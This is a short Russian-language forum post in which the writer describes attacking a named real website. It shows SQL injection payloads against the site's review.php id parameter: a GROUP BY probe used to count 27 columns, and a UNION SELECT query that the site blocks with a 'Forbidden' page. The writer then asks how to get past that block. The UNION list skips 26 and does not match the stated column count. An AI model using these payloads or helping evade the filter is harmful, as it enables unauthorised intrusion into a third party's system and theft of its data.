появилась проблема посерьёзнее предыдущий

в общем ситуация такая, есть пациент "avmaniacs.com", нашёл там sql inj, знаю точное кол-во стобцов, определил командой

www.avmaniacs.com/review.php?id=-319+group+by+27-- , если вместо 27 поставить число 28, то появится ошибка "Unknown column '28' in 'group statement'" следовательно стобцов 27

теперь вставляю такой запрос

www.avmaniacs.com/review.php?id=-319+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,27--

поидеи должна отобразится страница где покажутся несколько цифр, но мнесто этого вылазиет страница "Forbidden"

что можно мне сделать??